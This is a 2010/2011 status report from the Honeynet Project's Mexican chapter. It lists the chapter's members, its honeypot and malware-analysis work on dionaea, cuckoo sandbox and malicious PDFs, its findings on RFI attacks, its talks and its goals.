The Honeynet Project Mexican Chapter - Status Report 2010/2011

ORGANIZATION

New structure:
Hugo Gonzalez - Full Member, Chapter Leader
Miguel Lopez

New contributors:
Francisco Ordaz
Rafael Llamas
Armín García

The Chapter members are interested in research projects covering the following topics:

1. Low-interaction/high-interaction client honeypots
2. Distributed honeynet deployment, operation and data analysis
3. Automated malware collection and analysis systems

DEPLOYMENTS

* We have some boxes with dionaea.
* Skynet on the latin america domains.
* Parse some production webserver logs looking for RFI attacks.

RESEARCH AND DEVELOPMENT

* Working on the malicious PDF analysis. (Mahmud has been advising us)
We will release a light PDF analysis service on the web, based only in the characteristics of the PDF file and some IA stuff.

* Testing cuckoo sandbox, we will release soon a detailed Spanish docs on installation and configuration.

* IPv6 (in)security.

* Working on a "massive password analysis framework". (We could use this for the list of ssh attacks, if the attackers use the same lists or personalized ones for example)

* Web interface for visualization on the RFI's analysis. (Jose Narario is sharing a lot of RFI data with us)

FINDINGS

The RFI attackers are not always web servers as we assumed.

PAPERS AND PRESENTATIONS

*Does virus work on IPv6 only network?
Summer research 2010 on the UPSLP.

*Characteristics of a malicius PDF file.
CIBSI 2011

*Hands on lab on structured network analysis
BugCon Security Conferences 2010.

GOALS

*Improve our capacities on malware analysis.
*Began to analysis android malware.
*Implement an easy way to interpret cuckoo reports.
*Implement an easy way to send virus to cuckoo, like a web interface.
*Contribute to the cuckoo sandbox project
*Contribute to dionaea project.
*Cooperation with other chapters.
*Run a forensics challenge on IPv6

MISC ACTIVITIES

Help on forensics challenge 1 and 7.
Participate in the annual committee.
Work on education campaigns for information security.